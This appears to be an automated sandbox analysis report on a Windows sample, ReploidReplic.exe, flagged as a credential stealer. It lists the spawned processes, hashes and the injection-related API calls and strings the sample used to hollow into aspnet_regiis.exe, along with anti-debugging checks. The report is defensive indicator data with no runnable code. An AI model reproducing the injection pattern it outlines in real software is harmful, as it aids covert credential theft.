{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWSzIbtMZWhNRImwGpK5Gqz2VRVTGYUnFSzw65ji3MqXmMUMU4kv8xab%2BKGUPfiL4OxoceBxLpTRCX5ch7kUamDMM%2B%2FsfvNFZhw3AxlBotWjq7zoP%2FiAAZHsl9MQ9Cgqe26H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aaa23a5143be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1577&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3052&recv_bytes=1022&delivery_rate=2712074&cwnd=227&unsent_bytes=0&cid=7fa6def4b1ebbbfc&ts=479&x=0"
2024-12-30 20:09:16 UTC	54	IN	Data Raw: 33 30 0d 0a 45 4e 39 63 50 34 31 44 54 42 42 38 69 66 63 2b 53 37 30 47 79 6a 4b 31 6c 78 73 55 33 39 54 52 74 6b 76 4a 6c 50 56 31 42 6c 35 4c 67 67 3d 3d 0d 0a Data Ascii: 30EN9cP41DTBB8ifc+S70GyjK1lxsU39TRtkvJlPV1Bl5Lgg==
2024-12-30 20:09:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:09:02
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\ReploidReplic.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ReploidReplic.exe"
Imagebase:	0x800000
File size:	707'584 bytes
MD5 hash:	7DB52DDA50A584C20D69A00D2B13C63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:09:02
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:09:03
Start date:	30/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x910000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:09:03
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224
Imagebase:	0x3c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.6%
Total number of Nodes:	1484
Total number of Limit Nodes:	12

Executed Functions

Function 6CE078B0 Relevance: 99.8, APIs: 36, Strings: 17, Instructions: 7058nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 6CE0949B
ShowWindow.USER32 ref: 6CE094B1
VirtualAlloc.KERNELBASE ref: 6CE098F5
NtGetContextThread.NTDLL ref: 6CE0A02B
NtAllocateVirtualMemory.NTDLL ref: 6CE0A233
NtAllocateVirtualMemory.NTDLL ref: 6CE0A3E6
NtWriteVirtualMemory.NTDLL ref: 6CE0A88A
NtWriteVirtualMemory.NTDLL ref: 6CE0AF1C
NtReadVirtualMemory.NTDLL ref: 6CE0BF4D
NtWriteVirtualMemory.NTDLL ref: 6CE0C229
NtWriteVirtualMemory.NTDLL ref: 6CE0C822
NtCreateThreadEx.NTDLL ref: 6CE0CDD9
NtSetContextThread.NTDLL ref: 6CE0D012
NtResumeThread.NTDLL ref: 6CE0D030
CloseHandle.KERNEL32 ref: 6CE0D0CA
CloseHandle.KERNEL32 ref: 6CE0D0DE
GetConsoleWindow.KERNEL32 ref: 6CE0D224
ShowWindow.USER32 ref: 6CE0D23A
NtWriteVirtualMemory.NTDLL ref: 6CE0D6CE
NtReadVirtualMemory.NTDLL ref: 6CE0DB2E
NtWriteVirtualMemory.NTDLL ref: 6CE0DBA2
NtCreateThreadEx.NTDLL ref: 6CE0DD5D
CreateProcessW.KERNEL32 ref: 6CE0DE98
NtAllocateVirtualMemory.NTDLL ref: 6CE0DF91
NtWriteVirtualMemory.NTDLL ref: 6CE0E0AB
NtReadVirtualMemory.NTDLL ref: 6CE0E26C
NtWriteVirtualMemory.NTDLL ref: 6CE0E2F2
NtCreateThreadEx.NTDLL ref: 6CE0E427
CloseHandle.KERNEL32 ref: 6CE0E468
CloseHandle.KERNEL32 ref: 6CE0E47C
NtWriteVirtualMemory.NTDLL ref: 6CE0E575
NtCreateThreadEx.NTDLL ref: 6CE0E67F

Strings

kernel32.dll, xrefs: 6CE094B7, 6CE0D240
iN @, xrefs: 6CE0B73F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CE09B6C
B[, xrefs: 6CE0C286
H2xg, xrefs: 6CE0C414
WVC, xrefs: 6CE0790F, 6CE09373
D, xrefs: 6CE0996A
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CE09B1E
@, xrefs: 6CE0DF89
\\, xrefs: 6CE09F37
MZx, xrefs: 6CE094DF, 6CE09501, 6CE0D268, 6CE0D28A
<CYH, xrefs: 6CE0A9E3
L>x?, xrefs: 6CE0A2B2
Tg#C, xrefs: 6CE0BDD0
ntdll.dll, xrefs: 6CE094CB, 6CE0D254
0cu, xrefs: 6CE0B501
4#`, xrefs: 6CE0A2AD

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: Virtual$Memory$Write$Thread$Create$CloseHandleWindow$AllocateRead$ConsoleContextShow$AllocProcessResume
String ID: B[$0cu$4#`$<CYH$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$H2xg$L>x?$MZx$Tg#C$iN @$kernel32.dll$ntdll.dll$WVC$\\
API String ID: 491192412-2431828029
Opcode ID: 90ae9973f2cb897cfbb161c378ad801c16d3bc5f7af7605c57dfa9555c3000ce
Instruction ID: 8525625b8b057a399d4dbc8321c2da8604dc78051bbb062d1591c995adc07792
Opcode Fuzzy Hash: 90ae9973f2cb897cfbb161c378ad801c16d3bc5f7af7605c57dfa9555c3000ce
Instruction Fuzzy Hash: 53C3F176B056118FCB18CE3CDD943D977F2AB87355F2081A9D819EBB90C6358E998F80

Function 6CE017F0 Relevance: 52.3, APIs: 19, Strings: 9, Instructions: 3277memoryfileCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CE02672
GetModuleHandleA.KERNEL32 ref: 6CE027A7
K32GetModuleInformation.KERNEL32 ref: 6CE02AAF
GetModuleFileNameA.KERNEL32 ref: 6CE02B3C
CreateFileA.KERNELBASE ref: 6CE02C03
CreateFileMappingA.KERNEL32 ref: 6CE02FD4
CloseHandle.KERNEL32 ref: 6CE03504
VirtualProtect.KERNELBASE ref: 6CE03C23
VirtualProtect.KERNELBASE ref: 6CE03D49
CloseHandle.KERNELBASE ref: 6CE042B1
CloseHandle.KERNEL32 ref: 6CE042C5
CloseHandle.KERNEL32 ref: 6CE042E8
GetModuleHandleA.KERNEL32 ref: 6CE04326
GetModuleHandleA.KERNEL32 ref: 6CE04620
CreateFileA.KERNEL32 ref: 6CE046DF
CreateFileMappingA.KERNEL32 ref: 6CE0475D
VirtualProtect.KERNEL32 ref: 6CE04808

Strings

->]y, xrefs: 6CE048EB
B"S, xrefs: 6CE02A6D
->]y, xrefs: 6CE04567
wQgt, xrefs: 6CE02949
lE1{, xrefs: 6CE0294E
zdZ", xrefs: 6CE04197
wQgt, xrefs: 6CE02900
zdZ", xrefs: 6CE0414E
@, xrefs: 6CE047FC

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: Handle$FileModule$CloseCreate$ProtectVirtual$Mapping$CurrentInformationNameProcess
String ID: ->]y$->]y$@$B"S$lE1{$wQgt$wQgt$zdZ"$zdZ"
API String ID: 1533993013-1535988992
Opcode ID: cf95ede79f149bef361c719ee30e24c3b3cb068bb8f40854d29dbaa924309875
Instruction ID: 3dbb95f905129956862d6832b13637ed1fdfb7c980bba44f18ab32098732a535
Opcode Fuzzy Hash: cf95ede79f149bef361c719ee30e24c3b3cb068bb8f40854d29dbaa924309875
Instruction Fuzzy Hash: 9F430236B042508FCF04CE7CC9953DA77F2AB57354F209659E419EBB91CB3A898A8F41

Function 6CE06BD0 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 639
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6CE06E73
NtQueryInformationProcess.NTDLL ref: 6CE06F75

Strings

L<z}, xrefs: 6CE073E4
L<z}, xrefs: 6CE0745A
ntdll.dll, xrefs: 6CE06E67
NtQueryInformationProcess, xrefs: 6CE06E7B
Vf-5, xrefs: 6CE074D7
Vf-5, xrefs: 6CE073E9

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: HandleInformationModuleProcessQuery
String ID: L<z}$L<z}$NtQueryInformationProcess$Vf-5$Vf-5$ntdll.dll
API String ID: 2776635927-3946787029
Opcode ID: 766a41ea53b62fe5b5594bd83d7c4660665775bd564953ab996f43d003ec9648
Instruction ID: 48fd7214a8dfa69ab71e9acfba96a4641aa01848e86e0610aaf5345998821716
Opcode Fuzzy Hash: 766a41ea53b62fe5b5594bd83d7c4660665775bd564953ab996f43d003ec9648
Instruction Fuzzy Hash: 19220F76B642058FCF04CE7CC9953DE7BF2AB46318F204219D855EBB94C73A885B8B81

Function 6CE0FBF8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CE0FC3F
___scrt_uninitialize_crt.LIBCMT ref: 6CE0FC59

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 2c710061a19c1c4460c39b4bc295fadffe476582e46f508e6b041e1806c9815b
Instruction ID: c0711b5223c634336449a6f2c82a62b4b5675df8c45090556b20b1418c4db43c
Opcode Fuzzy Hash: 2c710061a19c1c4460c39b4bc295fadffe476582e46f508e6b041e1806c9815b
Instruction Fuzzy Hash: DC418F72F08658ABDB109FA5C841BAE3AB4EB41A9CF304519E81467B40D7388D35DBD8

Function 6CE0FCA8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CE0FCE5
dllmain_crt_dispatch.LIBCMT ref: 6CE0FCFC
dllmain_raw.LIBCMT ref: 6CE0FD44
dllmain_crt_dispatch.LIBCMT ref: 6CE0FD57
dllmain_raw.LIBCMT ref: 6CE0FD6A

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 2a650309a9a532b57394d123ecd52643a3a072ad8293c6ca103bac6b7e357183
Instruction ID: 529cb54f470e81125d3677063d2b004a23ec471ff707de11cea920d8791be705
Opcode Fuzzy Hash: 2a650309a9a532b57394d123ecd52643a3a072ad8293c6ca103bac6b7e357183
Instruction Fuzzy Hash: 47219472F05619ABCB214E55CC40BAF3A79EB41A9CB314129F81457B10D3388D35CBD4

Function 6CE0FAF1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CE0FB3E

Part of subcall function 6CE0FFBB: InitializeSListHead.KERNEL32(6CE6C388,6CE0FB48,6CE1F0D8,00000010,6CE0FAD9,?,?,?,6CE0FD01,?,00000001,?,?,00000001,?,6CE1F120), ref: 6CE0FFC0

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE0FBA8

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: cc169d915891a1aed237ba7e631f89a61421948944ba941bf6f608736e20a265
Instruction ID: 8fe00a6837015561fd2bf71e36515fc8bc862cc2fc3eb15ecfdfe4519d6092b6
Opcode Fuzzy Hash: cc169d915891a1aed237ba7e631f89a61421948944ba941bf6f608736e20a265
Instruction Fuzzy Hash: 8121D17238C2849EDB00ABB484207EA3771AB4637CF30454DD48527F81DB29443DCE9A

Function 6CE1491D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CE14969
GetFileType.KERNELBASE(00000000), ref: 6CE1497B

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: edfb2175fee79528a00c4f0925126772c8201229f67b5be9a71b560d84ac4320
Instruction ID: 33af14a930ca7e9aada0b3b22341db9c9e462e27f0e323c0d93a1ab8adf26fa3
Opcode Fuzzy Hash: edfb2175fee79528a00c4f0925126772c8201229f67b5be9a71b560d84ac4320
Instruction Fuzzy Hash: 9511727270C75346DB304D3E8884A26BAB4A78723CB38275BD0B696FE1C634D5A68649

Function 6CE15180 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CE151AE
_free.LIBCMT ref: 6CE151D4

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 485829bed7cc5e971ab4e8708c70cfb149b186606e69131c20fd7888ad078283
Instruction ID: 6b83482cc0f142fb73dcbe325f32c9102323af186cad8a53e35fa2667b79f5cf
Opcode Fuzzy Hash: 485829bed7cc5e971ab4e8708c70cfb149b186606e69131c20fd7888ad078283
Instruction Fuzzy Hash: 7D11B672B2A6109BDF21EE2E9C05B5733B4A75677CF38061AE522DBFC0D3B4C4568680

Function 6CE12EE6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CE12AE9,00000001,00000364,00000013,000000FF,?,00000001,6CE12ED8,6CE12F69,?,?,6CE1217C), ref: 6CE12F27

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e4d17636a4383aaa7edb7202fa05309bddf2e9eda9ef789657bf50f94b77d4ec
Instruction ID: 336ae1bf05bf891f0b0c8431bcc6cee33228dd958333e2439c9913ba3afdfbfb
Opcode Fuzzy Hash: e4d17636a4383aaa7edb7202fa05309bddf2e9eda9ef789657bf50f94b77d4ec
Instruction Fuzzy Hash: CBF0243161E12467EB224B268C0EB9B3778DF67378F308021E814B6F84CB20D42582E0

Non-executed Functions

Function 008592E0 Relevance: 9.4, Strings: 7, Instructions: 666COMMON

Download Yara Rule

Strings

b>c<, xrefs: 0085957D
k2`0, xrefs: 008595DB, 008595DF
]E, xrefs: 008596AC
]E, xrefs: 00859AE2
x;, xrefs: 008596B4
S, xrefs: 008596A4
,./,, xrefs: 008593C7

Memory Dump Source

Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd

Similarity

API ID:
String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
API String ID: 0-4038474941
Opcode ID: 1b9558a094cbc51ef7ad8de07ac57e9da7b309c5d51250fedc0cab29ea1a42e1
Instruction ID: 91d99b6e046ea4be9000c51e45c082ec4cda1128c04f6611e42e94e0d2dc5e12
Opcode Fuzzy Hash: 1b9558a094cbc51ef7ad8de07ac57e9da7b309c5d51250fedc0cab29ea1a42e1
Instruction Fuzzy Hash: 8E22FDB66083519BD310CF28C885B6BBBE5FBC5314F14892DE9D5DB2A0D775D809CB82

Function 6CE0E6B0 Relevance: 7.7, Strings: 5, Instructions: 1404COMMONLIBRARYCODE

Download Yara Rule

Strings

YX[, xrefs: 6CE0F3E3
YX[, xrefs: 6CE0F44E
DYT, xrefs: 6CE0F81A
DYT, xrefs: 6CE0F7A7
*9`", xrefs: 6CE0EF9B

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID:
String ID: *9`"$DYT$DYT$YX[$YX[
API String ID: 0-2530561887
Opcode ID: 04e240ef634c55f3b41b3a8f8676f7e5d6476ed4d973322bf4b2355f8d21a36a
Instruction ID: 67edd7b7e2c29fb2d4c438ab84e1d02b5a29b2151e4e5d2887cd5302097448d4
Opcode Fuzzy Hash: 04e240ef634c55f3b41b3a8f8676f7e5d6476ed4d973322bf4b2355f8d21a36a
Instruction Fuzzy Hash: 18A20236B455018FCF088D7CD5D53DE3BF2AB8B364F34912AD422E7B94C12E895A8B94

Function 6CE12C6A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE12D62
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE12D6C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE12D79

Strings

,dPl, xrefs: 6CE12C6C

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ,dPl
API String ID: 3906539128-1802902484
Opcode ID: 1848acbafdb78ba1fea5b01fc859ada2ce72456d96ceb60c9f53c013c900bce8
Instruction ID: 73aedcca05f4eb8d68af8b86b2e6f46f367449913c49d4b0ac61ac79974f44fa
Opcode Fuzzy Hash: 1848acbafdb78ba1fea5b01fc859ada2ce72456d96ceb60c9f53c013c900bce8
Instruction Fuzzy Hash: 6D31E6749512189BCF21DF28DD887DCBBB8BF59314F6041EAE41CA7650E7309B958F44

Function 6CE04900 Relevance: 6.1, Strings: 3, Instructions: 2347COMMON

Download Yara Rule

Strings

u#6, xrefs: 6CE0642A
wM2s, xrefs: 6CE05600
~8U, xrefs: 6CE06202

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID:
String ID: u#6$wM2s$~8U
API String ID: 0-3307174986
Opcode ID: e4a3c37390dbec79d4bd562d7824e55b9af113210d7379f712aa3b2f4e3845f7
Instruction ID: ffee39b4313a02463c5e193a102cc6ea90e24a790e40eb113bab99e28fefdb8d
Opcode Fuzzy Hash: e4a3c37390dbec79d4bd562d7824e55b9af113210d7379f712aa3b2f4e3845f7
Instruction Fuzzy Hash: 1F031F72B501118FDF18CE3CC9D53DA37F2AB43368F205659C81ADBB95C63A9A5A8F40

Function 6CE102DA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE102E6
IsDebuggerPresent.KERNEL32 ref: 6CE103B2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE103D2
UnhandledExceptionFilter.KERNEL32(?), ref: 6CE103DC

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 98e9045f9237a65670c5d08f365fd332f690b71e7500ed01616891f2c6cbaa1e
Instruction ID: e1bb83bed7c2a46de20f0766ac49c471913fdb78759ef8322bb7c28a21018934
Opcode Fuzzy Hash: 98e9045f9237a65670c5d08f365fd332f690b71e7500ed01616891f2c6cbaa1e
Instruction Fuzzy Hash: E5313875D45258DBDB10DFA4C9897CDBBB8BF08304F1041AAE408AB640EB705A998F05

Function 6CE11A65 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CE11A64,?,00000001,?,?), ref: 6CE11A87
TerminateProcess.KERNEL32(00000000,?,6CE11A64,?,00000001,?,?), ref: 6CE11A8E
ExitProcess.KERNEL32 ref: 6CE11AA0

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
